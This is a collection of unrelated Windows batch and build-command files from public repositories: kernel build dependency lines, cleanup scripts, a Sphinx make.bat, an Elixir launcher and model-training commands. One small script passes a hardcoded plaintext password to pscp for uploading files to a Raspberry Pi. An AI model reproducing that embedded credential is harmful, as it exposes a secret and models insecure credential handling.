$(wildcard include/config/pm.h) \
$(wildcard include/config/pm/sleep.h) \
$(wildcard include/config/pm/runtime.h) \
include/linux/node.h \
$(wildcard include/config/memory/hotplug/sparse.h) \
include/linux/irq_work.h \
/root/linux-jps/arch/arm/include/asm/local.h \
include/asm-generic/local.h \
include/linux/eventfd.h \
$(wildcard include/config/eventfd.h) \
fs/eventfd.o: $(deps_fs/eventfd.o)
$(deps_fs/eventfd.o):
|
jpsminix/minix5
|
fs/.eventfd.o.cmd
|
bat
|
gpl-2.0
| 27,715 |
cmd_kernel/power/built-in.o := /home/pasquale/android/arm-2009q3/bin/arm-none-eabi-ld -EL -r -o kernel/power/built-in.o kernel/power/main.o kernel/power/console.o kernel/power/process.o kernel/power/suspend.o kernel/power/nvs.o kernel/power/wakelock.o kernel/power/userwakelock.o kernel/power/earlysuspend.o kernel/power/fbearlysuspend.o kernel/power/poweroff.o
|
p500-ics-cm9/Franco-ICS-Kernel
|
kernel/power/.built-in.o.cmd
|
bat
|
gpl-2.0
| 367 |
cmd_net/bluetooth/hidp/built-in.o := /home/erik/froyo/prebuilt/linux-x86/toolchain/arm-eabi-4.4.0/bin/arm-eabi-ld -EL -r -o net/bluetooth/hidp/built-in.o net/bluetooth/hidp/hidp.o
|
kingklick/kk-evo-kernel
|
net/bluetooth/hidp/.built-in.o.cmd
|
bat
|
gpl-2.0
| 185 |
cmd_drivers/mtd/built-in.o := /home/sunghun/arm-2009q3/bin/arm-none-linux-gnueabi-ld -EL -r -o drivers/mtd/built-in.o drivers/mtd/mtd.o drivers/mtd/mtdconcat.o drivers/mtd/cmdlinepart.o drivers/mtd/mtdchar.o drivers/mtd/mtd_blkdevs.o drivers/mtd/mtdblock.o drivers/mtd/chips/built-in.o drivers/mtd/lpddr/built-in.o drivers/mtd/maps/built-in.o drivers/mtd/devices/built-in.o drivers/mtd/nand/built-in.o drivers/mtd/onenand/built-in.o drivers/mtd/tests/built-in.o drivers/mtd/ubi/built-in.o
|
sktjdgns1189/android_kernel_iriver_MX100
|
drivers/mtd/.built-in.o.cmd
|
bat
|
gpl-2.0
| 494 |
cmd_drivers/spi/built-in.o := /home/doadin/android/kernel/toolchains/arm-eabi-4.4.3/bin/arm-eabi-ld -EL -r -o drivers/spi/built-in.o drivers/spi/spi.o
|
doadin/samsung-kernel-msm7x30-Doadin
|
drivers/spi/.built-in.o.cmd
|
bat
|
gpl-2.0
| 156 |
@ECHO OFF
@ECHO 1. Apagando diretorios
if exist Reports (
RD Reports /S /Q
)
if exist coverage (
RD coverage /S /Q
)
if exist CodeCoverageHTML (
RD CodeCoverageHTML /S /Q
)
@ECHO 2. Apagando arquivos
if exist emma.xml (
DEL emma.xml
)
if exist TestResult.xml (
DEL TestResult.xml
)
if exist results.xml (
DEL results.xml
)
if exist outputCobertura.xml (
DEL outputCobertura.xml
)
if exist outputCoverage.xml (
DEL outputCoverage.xml
)
if exist dupReport.html (
DEL dupReport.html
)
if exist dupReport.xml (
DEL dupReport.xml
)
|
rodrigolessa/demo.framework
|
demo.frm/clean.bat
|
bat
|
gpl-2.0
| 548 |
cmd_sound/pci/ca0106/built-in.o := rm -f sound/pci/ca0106/built-in.o; /opt/toolchains/arm-eabi-4.4.3/bin/arm-eabi-ar rcs sound/pci/ca0106/built-in.o
|
TeamGlide/LiteKernel
|
sound/pci/ca0106/.built-in.o.cmd
|
bat
|
gpl-2.0
| 150 |
set KEY=%1
set ALLFACIC=%2
set HLDG=%3
SET TITLE=%4
set TAG_RESUMIDO=%5
set THIS_CISIS=%6
SET THIS_PATH=%7
set MY_TMP_PATH=%8\geraCompactado
set DEBUG=%9
set LOG_FILE=%8\%KEY%.log
SET TAG_ID=30
set TAG_TIME=90
SET PROC_ID=%RANDOM%
SET TIME_START=%DATE%%TIME%
SET SEP=_
SET THIS_PROC_TMP_PATH=%MY_TMP_PATH%\%KEY%\%PROC_ID%
set PROC_FILE=%THIS_PROC_TMP_PATH%\proc.prc
SET PROC_FILE_CHECK=%THIS_PROC_TMP_PATH%\check.proc.prc
SET DO_TEMP_HLDG=%8\%KEY%.temp.txt
if exist %THIS_PROC_TMP_PATH% del %THIS_PROC_TMP_PATH%\* /s /q
if exist %THIS_PROC_TMP_PATH% rmdir %THIS_PROC_TMP_PATH% /s /q
echo %THIS_PROC_TMP_PATH%>%LOG_FILE%
mkdir %THIS_PROC_TMP_PATH%
echo %DATE%%TIME% >> %LOG_FILE%
rem rem rem rem rem rem rem rem rem rem rem rem rem rem rem rem rem rem rem
rem Create or update record of HLDG.
rem
call %THIS_PATH%\win\hldg_db.bat %THIS_CISIS% %TITLE% %KEY% %TAG_RESUMIDO% %HLDG% %LOG_FILE% %THIS_PATH% %THIS_PROC_TMP_PATH%
rem rem rem rem rem rem rem rem rem rem rem rem rem rem rem rem rem rem rem
rem Classify the records from FACIC according to regular or special issues (REG x SPEC).
rem
echo Classify the records from FACIC >> %LOG_FILE%
rem copy %THIS_PATH%\empty.txt %THIS_PROC_TMP_PATH%\REG.txt
rem copy %THIS_PATH%\empty.txt %THIS_PROC_TMP_PATH%\SPEC.txt
rem %THIS_CISIS%\mx %ALLFACIC% btell=0 "%KEY%=$" lw=99999 "proc='d920a920{',s('000000000000000000000000000000',v920),'{'" "proc='d920a920{',mid(v920,size(v920)-30+1,30),'{'" "pft='echo ',v920,'%SEP%',v911,'%SEP%',v912,'%SEP%',v913,'%SEP%',v914,'>> %THIS_PROC_TMP_PATH%\',if v913:'S' or v913:'P' or v913:'NE' or v913:'IN' or v913:'AN' then 'SPEC' else 'REG' fi,'.txt'/" now > %THIS_PROC_TMP_PATH%\classify_facic.bat
rem echo Executing %THIS_PROC_TMP_PATH%\classify_facic.bat >> %LOG_FILE%
rem call %THIS_PATH%\win\cat %THIS_PROC_TMP_PATH%\classify_facic.bat >> %LOG_FILE%
rem call %THIS_PROC_TMP_PATH%\classify_facic.bat
if not exist %DO_TEMP_HLDG% %THIS_CISIS%\mx %ALLFACIC% btell=0 "%KEY%=$" lw=99999 "proc='d920a920{',s('000000000000000000000000000000',v920),'{'" "proc='d920a920{',mid(v920,size(v920)-30+1,30),'{'" "pft=if instr(':PT:S:NE:BI:IN:AN:',s(':',v916,':'))>0 or size(v916)>0 then 'S' else 'R' fi,replace(s(v920,'%SEP%',v911,'%SEP%',v912,'%SEP%',v913,'%SEP%',v914,'%SEP%',if instr(':PT:S:NE:BI:IN:AN:',s(':',v916,':'))>0 then v916 else '' fi,'%SEP%',v910),'%SEP% %SEP%','%SEP%%SEP%')/" now | sort > %THIS_PROC_TMP_PATH%\ORD.txt
if exist %DO_TEMP_HLDG% more %DO_TEMP_HLDG% | sort > %THIS_PROC_TMP_PATH%\ORD.txt
rem rem rem rem rem rem rem rem rem rem rem rem rem rem rem rem rem rem rem
rem Generate the proc which will create the resumed form
rem
copy %THIS_PATH%\empty.txt %PROC_FILE_CHECK%
copy %THIS_PATH%\empty.txt %PROC_FILE%
if exist %THIS_PROC_TMP_PATH%\ORD.txt call %THIS_PATH%\win\generateForFacic.bat %THIS_CISIS% %THIS_PROC_TMP_PATH%\ORD %THIS_PATH% %PROC_FILE% %LOG_FILE% %TAG_RESUMIDO% %SEP% %PROC_FILE_CHECK% %DEBUG%
rem rem rem rem rem rem rem rem rem rem rem rem rem rem rem rem rem rem rem
rem Apply the proc
rem
set TIME_END=%DATE%%TIME%
if exist %DO_TEMP_HLDG% goto TEMP_HLDG
%THIS_CISIS%\mx %HLDG% btell=0 "tit=%KEY%" "proc='d*','a10{',v10,'{'," "proc='a%TAG_ID%{%KEY%{a%TAG_TIME%{^s%TIME_START%^e%TIME_END%{'" "proc='a%TAG_TIME%{^d',f(val(s(v%TAG_TIME%^e*11))-val(s(v%TAG_TIME%^s*11)),1,0),'{'" "proc=@%PROC_FILE%" "proc=@%PROC_FILE_CHECK%" copy=%HLDG% now -all
:TEMP_HLDG
move %PROC_FILE% %DO_TEMP_HLDG%.result
if exist %DO_TEMP_HLDG% del %DO_TEMP_HLDG%
echo %DATE%%TIME% >> %LOG_FILE%
if not "@%DEBUG%"=="@yes" del %THIS_PROC_TMP_PATH%\* /s /q
if not "@%DEBUG%"=="@yes" rmdir %THIS_PROC_TMP_PATH% /s /q
|
SuporteCTRL/suitesaber
|
htdocs/secs-web/hldgModule/win/generateForJournal.bat
|
bat
|
gpl-3.0
| 3,810 |
@ECHO OFF
REM Command file for Sphinx documentation
if "%SPHINXBUILD%" == "" (
set SPHINXBUILD=sphinx-build
)
set BUILDDIR=build
set ALLSPHINXOPTS=-d %BUILDDIR%/doctrees %SPHINXOPTS% source
set I18NSPHINXOPTS=%SPHINXOPTS% source
if NOT "%PAPER%" == "" (
set ALLSPHINXOPTS=-D latex_paper_size=%PAPER% %ALLSPHINXOPTS%
set I18NSPHINXOPTS=-D latex_paper_size=%PAPER% %I18NSPHINXOPTS%
)
if "%1" == "" goto help
if "%1" == "help" (
:help
echo.Please use `make ^<target^>` where ^<target^> is one of
echo. html to make standalone HTML files
echo. dirhtml to make HTML files named index.html in directories
echo. singlehtml to make a single large HTML file
echo. pickle to make pickle files
echo. json to make JSON files
echo. htmlhelp to make HTML files and a HTML help project
echo. qthelp to make HTML files and a qthelp project
echo. devhelp to make HTML files and a Devhelp project
echo. epub to make an epub
echo. latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter
echo. text to make text files
echo. man to make manual pages
echo. texinfo to make Texinfo files
echo. gettext to make PO message catalogs
echo. changes to make an overview over all changed/added/deprecated items
echo. xml to make Docutils-native XML files
echo. pseudoxml to make pseudoxml-XML files for display purposes
echo. linkcheck to check all external links for integrity
echo. doctest to run all doctests embedded in the documentation if enabled
goto end
)
if "%1" == "clean" (
for /d %%i in (%BUILDDIR%\*) do rmdir /q /s %%i
del /q /s %BUILDDIR%\*
goto end
)
%SPHINXBUILD% 2> nul
if errorlevel 9009 (
echo.
echo.The 'sphinx-build' command was not found. Make sure you have Sphinx
echo.installed, then set the SPHINXBUILD environment variable to point
echo.to the full path of the 'sphinx-build' executable. Alternatively you
echo.may add the Sphinx directory to PATH.
echo.
echo.If you don't have Sphinx installed, grab it from
echo.http://sphinx-doc.org/
exit /b 1
)
if "%1" == "html" (
%SPHINXBUILD% -b html %ALLSPHINXOPTS% %BUILDDIR%/html
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/html.
goto end
)
if "%1" == "dirhtml" (
%SPHINXBUILD% -b dirhtml %ALLSPHINXOPTS% %BUILDDIR%/dirhtml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/dirhtml.
goto end
)
if "%1" == "singlehtml" (
%SPHINXBUILD% -b singlehtml %ALLSPHINXOPTS% %BUILDDIR%/singlehtml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/singlehtml.
goto end
)
if "%1" == "pickle" (
%SPHINXBUILD% -b pickle %ALLSPHINXOPTS% %BUILDDIR%/pickle
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can process the pickle files.
goto end
)
if "%1" == "json" (
%SPHINXBUILD% -b json %ALLSPHINXOPTS% %BUILDDIR%/json
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can process the JSON files.
goto end
)
if "%1" == "htmlhelp" (
%SPHINXBUILD% -b htmlhelp %ALLSPHINXOPTS% %BUILDDIR%/htmlhelp
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can run HTML Help Workshop with the ^
.hhp project file in %BUILDDIR%/htmlhelp.
goto end
)
if "%1" == "qthelp" (
%SPHINXBUILD% -b qthelp %ALLSPHINXOPTS% %BUILDDIR%/qthelp
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can run "qcollectiongenerator" with the ^
.qhcp project file in %BUILDDIR%/qthelp, like this:
echo.^> qcollectiongenerator %BUILDDIR%\qthelp\supervisorclusterctl.qhcp
echo.To view the help file:
echo.^> assistant -collectionFile %BUILDDIR%\qthelp\supervisorclusterctl.ghc
goto end
)
if "%1" == "devhelp" (
%SPHINXBUILD% -b devhelp %ALLSPHINXOPTS% %BUILDDIR%/devhelp
if errorlevel 1 exit /b 1
echo.
echo.Build finished.
goto end
)
if "%1" == "epub" (
%SPHINXBUILD% -b epub %ALLSPHINXOPTS% %BUILDDIR%/epub
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The epub file is in %BUILDDIR%/epub.
goto end
)
if "%1" == "latex" (
%SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex
if errorlevel 1 exit /b 1
echo.
echo.Build finished; the LaTeX files are in %BUILDDIR%/latex.
goto end
)
if "%1" == "latexpdf" (
%SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex
cd %BUILDDIR%/latex
make all-pdf
cd %BUILDDIR%/..
echo.
echo.Build finished; the PDF files are in %BUILDDIR%/latex.
goto end
)
if "%1" == "latexpdfja" (
%SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex
cd %BUILDDIR%/latex
make all-pdf-ja
cd %BUILDDIR%/..
echo.
echo.Build finished; the PDF files are in %BUILDDIR%/latex.
goto end
)
if "%1" == "text" (
%SPHINXBUILD% -b text %ALLSPHINXOPTS% %BUILDDIR%/text
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The text files are in %BUILDDIR%/text.
goto end
)
if "%1" == "man" (
%SPHINXBUILD% -b man %ALLSPHINXOPTS% %BUILDDIR%/man
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The manual pages are in %BUILDDIR%/man.
goto end
)
if "%1" == "texinfo" (
%SPHINXBUILD% -b texinfo %ALLSPHINXOPTS% %BUILDDIR%/texinfo
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The Texinfo files are in %BUILDDIR%/texinfo.
goto end
)
if "%1" == "gettext" (
%SPHINXBUILD% -b gettext %I18NSPHINXOPTS% %BUILDDIR%/locale
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The message catalogs are in %BUILDDIR%/locale.
goto end
)
if "%1" == "changes" (
%SPHINXBUILD% -b changes %ALLSPHINXOPTS% %BUILDDIR%/changes
if errorlevel 1 exit /b 1
echo.
echo.The overview file is in %BUILDDIR%/changes.
goto end
)
if "%1" == "linkcheck" (
%SPHINXBUILD% -b linkcheck %ALLSPHINXOPTS% %BUILDDIR%/linkcheck
if errorlevel 1 exit /b 1
echo.
echo.Link check complete; look for any errors in the above output ^
or in %BUILDDIR%/linkcheck/output.txt.
goto end
)
if "%1" == "doctest" (
%SPHINXBUILD% -b doctest %ALLSPHINXOPTS% %BUILDDIR%/doctest
if errorlevel 1 exit /b 1
echo.
echo.Testing of doctests in the sources finished, look at the ^
results in %BUILDDIR%/doctest/output.txt.
goto end
)
if "%1" == "xml" (
%SPHINXBUILD% -b xml %ALLSPHINXOPTS% %BUILDDIR%/xml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The XML files are in %BUILDDIR%/xml.
goto end
)
if "%1" == "pseudoxml" (
%SPHINXBUILD% -b pseudoxml %ALLSPHINXOPTS% %BUILDDIR%/pseudoxml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The pseudo-XML files are in %BUILDDIR%/pseudoxml.
goto end
)
:end
|
RobWin/supervisorclusterctl
|
docs/make.bat
|
bat
|
gpl-3.0
| 6,496 |
copy ..\..\..\lib\Win32\debug\ptlibd.def ptlibd_2012_x86.dtf
copy ..\..\..\lib\Win32\release\ptlib.def ptlib_2012_x86.dtf
copy "..\..\..\lib\Win32\No Trace\ptlibn.def" ptlibn_2012_x86.dtf
copy ..\..\..\lib\x64\debug\ptlib64d.def ptlibd_2012_x64.dtf
copy ..\..\..\lib\x64\release\ptlib64.def ptlib_2012_x64.dtf
copy "..\..\..\lib\x64\No Trace\ptlib64n.def" ptlibn_2012_x64.dtf
pause
|
YuxuanLing/trunk
|
trunk/references/OpenH323/ptlib-2.12.8-src/ptlib/include/ptlib/msos/CopyDTF_2012.bat
|
bat
|
gpl-3.0
| 391 |
cd %CODE_DIR%/utool %*
|
Erotemic/local
|
windows/oldscripts/ut.bat
|
bat
|
gpl-3.0
| 22 |
@echo off
set ADA_INCLUDE_PATH=%ADA_INCLUDE_PATH%;%RADALIB_ROOT%\source
set ADA_OBJECTS_PATH=%ADA_OBJECTS_PATH%;%RADALIB_ROOT%\compiled
gnatmake -O2 Spanning_Tree.adb
del *.ali
del *.o
echo -----------
Spanning_Tree.exe test-spanning_tree_toy.net test-spanning_tree_toy-min_st.net MIN Integer
Spanning_Tree.exe test-spanning_tree_toy.net test-spanning_tree_toy-max1_st.net MAX Float 2
Spanning_Tree.exe test-spanning_tree_toy.net test-spanning_tree_toy-max2_st.net MAX Double
echo -----------
del Spanning_Tree.exe
pause
|
sergio-gomez/Radalib
|
tools/Spanning_Tree.bat
|
bat
|
lgpl-2.1
| 535 |
@if "%_echo%"=="" echo off
setlocal
REM Configure the sample, i.e. where to find the F# compiler and C# compiler.
call %~d0%~p0..\..\..\config.bat
"%FSC%" --out:provider.dll -a provider.fs
if errorlevel 1 goto :Error
"%FSC%" --out:providerDesigner.dll -a providerDesigner.fsx
call %~d0%~p0..\..\single-test-build.bat
goto :Ok
:Ok
echo. > build.ok
endlocal
exit /b 0
:Error
endlocal
exit /b %ERRORLEVEL%
|
chkn/fsharp
|
tests/fsharp/typeProviders/splitAssembly/build.bat
|
bat
|
apache-2.0
| 409 |
@echo off
.\tools\nant\NAnt.exe %*
|
JunctionBoxca/Rest-In-Practise-Product-Catalog-Service
|
go.bat
|
bat
|
apache-2.0
| 35 |
REM use small set with 10k training
REM use rmspropwithmomentum
set MAXEPOCH=40
set EACHEPOCH=1
set HDIM=%3
set ADIM=%HDIM%
REM set IDIM=50
set IDIM=%2
set NLAYER=2
set STG=s41_full
set RNN=gru
set ETA=%1
set SCALE=0.1
set CLIP=5.0
set TRAINER=rmspropwithmomentum
set NUTT=10
set CMDT=AWI_InputFeedingWithNNAttention
set TAG=%STG%.%CMDT%.nosplitdialogue.%RNN%.e%ETA%.s%SCALE%.%TRAINER%.h%HDIM%.i%IDIM%.l%NLAYER%.clip%CLIP%.bsize%NUTT%.sz10k
REM call //gcr/scratch/b99/kaisheny/exp/Dialogue/setenv.s03.consattentional.bat
call //speechstore5/transient/kaishengy/exp/Dialogue/setenv.s03.consattentional.bat
echo %BINPATH%\attention_with_intention.nn.exe --nparallel %NUTT% --nosplitdialogue --clip %CLIP% --%CMDT% --trainer %TRAINER% --scale %SCALE% --eta %ETA% --%RNN% --layers %NLAYER% --seed 127 --hidden %HDIM% --align %ADIM% --intentiondim %IDIM% --epochs %MAXEPOCH% --readdict %WORKPATH%/lib/all.dict --parameters %WORKPATH%/models/%TAG%.mdl -t %DATAPATH%/mswindowshelp.trn.dat.unk -d %DATAPATH%/mswindowshelp.dev.dat.unk > %WORKPATH%/logs/train.%TAG%.log 2>&1
%BINPATH%\attention_with_intention.nn.exe --nparallel %NUTT% --nosplitdialogue --clip %CLIP% --%CMDT% --trainer %TRAINER% --scale %SCALE% --eta %ETA% --%RNN% --layers %NLAYER% --seed 127 --hidden %HDIM% --align %ADIM% --intentiondim %IDIM% --epochs %MAXEPOCH% --readdict %WORKPATH%/lib/all.dict --parameters %WORKPATH%/models/%TAG%.mdl -t %DATAPATH%/mswindowshelp.trn.dat.unk -d %DATAPATH%/mswindowshelp.dev.dat.unk >> %WORKPATH%/logs/train.%TAG%.log 2>>&1
REM D:\dev\quartzin\exp\dialogue>D:\dev\mycnn\msbuild\conversation\dev\src\Release\attention_with_intention.exe --verbose --nparallel 10 --nosplitdialogue --clip 5.0 --AWI_InputFeedingWDropout --trainer rmspropwithmomentum --scale 0.1 --eta 0.1 --gru --layers 2 --seed 127 --hidden 20 --align 20 --intentiondim 5 --epochs 40 --readdict \\speechstore5\transient\kaishengy\exp\dialogue/lib/all.dict --parameters d:\dev\quartzin\exp\dialogue\models\s33_s02.AWI_LocalGeneralInputFeeding.nosplitdialogue.gru.e50.0.s0.1.rmspropwithmomentum.h200.i50.l2.clip5.0.bsize10.sz10k.mdl -t //speechstore5/transient/kaishengy/data/DialogueSamelanguage/mswindowshelp.trn.dat.unk.dbg -d //speechstore5/transient/kaishengy/data/DialogueSamelanguage/mswindowshelp.dev.dat.unk.dbg
goto exit
:test
echo %BINPATH%\attention_with_intention.nn.exe --nparallel %NUTT% --nosplitdialogue --clip %CLIP% --%CMDT% --trainer %TRAINER% --scale %SCALE% --eta %ETA% --%RNN% --layers %NLAYER% --seed 127 --hidden %HDIM% --align %ADIM% --intentiondim %IDIM% --epochs %MAXEPOCH% --readdict %WORKPATH%/lib/all.dict --parameters %WORKPATH%/models/%TAG%.mdl --testcorpus %DATAPATH%/mswindowshelp.tst.dat.unk.2000 --outputfile %WORKPATH%/logs/test.%TAG%.results > %WORKPATH%/logs/test.%TAG%.log 2>&1
%BINPATH%\attention_with_intention.nn.exe --nparallel %NUTT% --nosplitdialogue --clip %CLIP% --%CMDT% --trainer %TRAINER% --scale %SCALE% --eta %ETA% --%RNN% --layers %NLAYER% --seed 127 --hidden %HDIM% --align %ADIM% --intentiondim %IDIM% --epochs %MAXEPOCH% --readdict %WORKPATH%/lib/all.dict --parameters %WORKPATH%/models/%TAG%.mdl --testcorpus %DATAPATH%/mswindowshelp.tst.dat.unk.2000 --outputfile %WORKPATH%/logs/test.%TAG%.results >> %WORKPATH%/logs/test.%TAG%.log 2>>&1
REM --verbose --nparallel 10 --nosplitdialogue --clip 5.0 --AWI_GeneralInputFeeding --trainer rmspropwithmomentum --scale 0.1 --eta 50.0 --gru --layers 2 --seed 127 --hidden 200 --align 200 --intentiondim 50 --epochs 40 --readdict \\speechstore5\transient\kaishengy\exp\dialogue/lib/all.dict --initialise \\speechstore5\transient\kaishengy\exp\dialogue/models/s38_s02.AWI_GeneralInputFeeding.nosplitdialogue.gru.e50.0.s0.1.rmspropwithmomentum.h200.i50.l2.clip5.0.bsize10.sz10k.mdl --testcorpus //speechstore5/transient/kaishengy/data/DialogueSamelanguage/mswindowshelp.trn.dat.unk.1 --outputfile \\speechstore5\transient\kaishengy\exp\dialogue/logs/xxx.log
goto exit
:exit
|
kaishengyao/cnn
|
exp/dialogue/s41.rmspropwithmomentum.gru.AWI_InputFeedingDropout.s01.eta.hd.i50.bat
|
bat
|
apache-2.0
| 3,984 |
@echo off
pscp -l pi -pw !16root_ %1 [email protected]:/var/www/html
|
seayjohnny/rasp-pi-api
|
apache-server-scripts/batch/put.bat
|
bat
|
apache-2.0
| 66 |
@echo off
SET basedir=%~dp0
set param=%~1
echo 'EXECUTE: powershell -executionPolicy bypass -file "%basedir%\ps\modfiy_user_permissions.ps1" "%param%"'
REM echo | is neccessary to not block the execution if the cmd script is called from java
echo | powershell.exe -executionPolicy bypass -file "%basedir%\ps\modfiy_user_permissions.ps1" "%param%"
echo 'END!'
|
ConSol/sakuli
|
src/common/src/main/resources/org/sakuli/common/bin/installer_scripts/win/set_user_permissions.bat
|
bat
|
apache-2.0
| 361 |
@if defined ELIXIR_CLI_ECHO (@echo on) else (@echo off)
setlocal enabledelayedexpansion
if ""%1""=="""" goto documentation
if /I ""%1""==""--help"" goto documentation
if /I ""%1""==""-h"" goto documentation
if /I ""%1""==""/h"" goto documentation
if ""%1""==""/?"" goto documentation
goto parseopts
:documentation
echo Usage: %~nx0 [options] [.exs file] [data]
echo.
echo ## General options
echo.
echo -e "COMMAND" Evaluates the given command (*)
echo -h, --help Prints this message and exits
echo -r "FILE" Requires the given files/patterns (*)
echo -S SCRIPT Finds and executes the given script in $PATH
echo -pr "FILE" Requires the given files/patterns in parallel (*)
echo -pa "PATH" Prepends the given path to Erlang code path (*)
echo -pz "PATH" Appends the given path to Erlang code path (*)
echo -v, --version Prints Elixir version and exits
echo.
echo --app APP Starts the given app and its dependencies (*)
echo --erl "SWITCHES" Switches to be passed down to Erlang (*)
echo --eval "COMMAND" Evaluates the given command, same as -e (*)
echo --logger-otp-reports BOOL Enables or disables OTP reporting
echo --logger-sasl-reports BOOL Enables or disables SASL reporting
echo --no-halt Does not halt the Erlang VM after execution
echo --werl Uses Erlang's Windows shell GUI (Windows only)
echo.
echo Options given after the .exs file or -- are passed down to the executed code.
echo Options can be passed to the Erlang runtime using $ELIXIR_ERL_OPTIONS or --erl.
echo.
echo ## Distribution options
echo.
echo The following options are related to node distribution.
echo.
echo --cookie COOKIE Sets a cookie for this distributed node
echo --hidden Makes a hidden node
echo --name NAME Makes and assigns a name to the distributed node
echo --rpc-eval NODE "COMMAND" Evaluates the given command on the given remote node (*)
echo --sname NAME Makes and assigns a short name to the distributed node
echo.
echo ## Release options
echo.
echo The following options are generally used under releases.
echo.
echo --boot "FILE" Uses the given FILE.boot to start the system
echo --boot-var VAR "VALUE" Makes $VAR available as VALUE to FILE.boot (*)
echo --erl-config "FILE" Loads configuration in FILE.config written in Erlang (*)
echo --vm-args "FILE" Passes the contents in file as arguments to the VM
echo.
echo --pipe-to is not supported on Windows. If set, Elixir won't boot.
echo.
echo ** Options marked with (*) can be given more than once.
goto end
:parseopts
rem Parameters for Elixir
set parsElixir=
rem Parameters for Erlang
set parsErlang=
rem Optional parameters before the "-extra" parameter
set beforeExtra=
rem Option which determines whether the loop is over
set endLoop=0
rem Designates which mode / Elixir component to run as
set runMode="elixir"
rem Designates the path to the current script
set SCRIPT_PATH=%~dp0
rem Designates the path to the ERTS system
set ERTS_BIN=
rem Recursive loop called for each parameter that parses the cmd line parameters
:startloop
set "par=%~1"
if "!par!"=="" (
rem skip if no parameter
goto expand_erl_libs
)
shift
set par="!par:"=\"!"
if !endLoop! == 1 (
set parsElixir=!parsElixir! !par!
goto startloop
)
rem ******* EXECUTION OPTIONS **********************
if !par!=="--werl" (set useWerl=1 && goto startloop)
if !par!=="+iex" (set parsElixir=!parsElixir! +iex && set runMode="iex" && goto startloop)
if !par!=="+elixirc" (set parsElixir=!parsElixir! +elixirc && set runMode="elixirc" && goto startloop)
rem ******* EVAL PARAMETERS ************************
if ""==!par:-e=! (
set "VAR=%~1"
set parsElixir=!parsElixir! -e "!VAR:"=\"!"
shift
goto startloop
)
if ""==!par:--eval=! (
set "VAR=%~1"
set parsElixir=!parsElixir! --eval "!VAR:"=\"!"
shift
goto startloop
)
if ""==!par:--rpc-eval=! (
set "VAR=%~2"
set parsElixir=!parsElixir! --rpc-eval %1 "!VAR:"=\"!"
shift
shift
goto startloop
)
rem ******* ELIXIR PARAMETERS **********************
if ""==!par:-r=! (set "parsElixir=!parsElixir! -r %1" && shift && goto startloop)
if ""==!par:-pr=! (set "parsElixir=!parsElixir! -pr %1" && shift && goto startloop)
if ""==!par:-pa=! (set "parsElixir=!parsElixir! -pa %1" && shift && goto startloop)
if ""==!par:-pz=! (set "parsElixir=!parsElixir! -pz %1" && shift && goto startloop)
if ""==!par:-v=! (set "parsElixir=!parsElixir! -v" && goto startloop)
if ""==!par:--app=! (set "parsElixir=!parsElixir! --app %1" && shift && goto startloop)
if ""==!par:--no-halt=! (set "parsElixir=!parsElixir! --no-halt" && goto startloop)
if ""==!par:--remsh=! (set "parsElixir=!parsElixir! --remsh %1" && shift && goto startloop)
if ""==!par:--dot-iex=! (set "parsElixir=!parsElixir! --dot-iex %1" && shift && goto startloop)
rem ******* ERLANG PARAMETERS **********************
if ""==!par:--boot=! (set "parsErlang=!parsErlang! -boot %1" && shift && goto startloop)
if ""==!par:--boot-var=! (set "parsErlang=!parsErlang! -boot_var %1 %2" && shift && shift && goto startloop)
if ""==!par:--cookie=! (set "parsErlang=!parsErlang! -setcookie %1" && shift && goto startloop)
if ""==!par:--hidden=! (set "parsErlang=!parsErlang! -hidden" && goto startloop)
if ""==!par:--detached=! (set "parsErlang=!parsErlang! -detached" && echo warning: the --detached option is deprecated && goto startloop)
if ""==!par:--erl-config=! (set "parsErlang=!parsErlang! -config %1" && shift && goto startloop)
if ""==!par:--logger-otp-reports=! (set "parsErlang=!parsErlang! -logger handle_otp_reports %1" && shift && goto startloop)
if ""==!par:--logger-sasl-reports=! (set "parsErlang=!parsErlang! -logger handle_sasl_reports %1" && shift && goto startloop)
if ""==!par:--name=! (set "parsErlang=!parsErlang! -name %1" && shift && goto startloop)
if ""==!par:--sname=! (set "parsErlang=!parsErlang! -sname %1" && shift && goto startloop)
if ""==!par:--vm-args=! (set "parsErlang=!parsErlang! -args_file %1" && shift && goto startloop)
if ""==!par:--erl=! (set "beforeExtra=!beforeExtra! %~1" && shift && goto startloop)
if ""==!par:--pipe-to=! (echo --pipe-to : Option is not supported on Windows && goto end)
set endLoop=1
set parsElixir=!parsElixir! !par!
goto startloop
:expand_erl_libs
rem expand all ebin paths as Windows does not support the ..\*\ebin wildcard
set ext_libs=
for /d %%d in ("!SCRIPT_PATH!..\lib\*.") do (
set ext_libs=!ext_libs! -pa "%%~fd\ebin"
)
:run
if not !runMode! == "iex" (
set beforeExtra=-noshell -s elixir start_cli !beforeExtra!
)
if defined useWerl (
start "" "!ERTS_BIN!werl.exe" !ext_libs! !ELIXIR_ERL_OPTIONS! !parsErlang! !beforeExtra! -extra !parsElixir!
) else (
"!ERTS_BIN!erl.exe" !ext_libs! !ELIXIR_ERL_OPTIONS! !parsErlang! !beforeExtra! -extra !parsElixir!
)
:end
endlocal
|
lexmag/elixir
|
bin/elixir.bat
|
bat
|
apache-2.0
| 7,301 |
@echo off
setlocal EnableDelayedExpansion
echo ***************************************************************************
echo compile_packages.bat
echo by niuren.zhu
echo 2016.06.19
echo ˵Ã÷£º
echo 1. °²×°apache-maven£¬ÏÂÔØµØÖ·http://maven.apache.org/download.cgi¡£
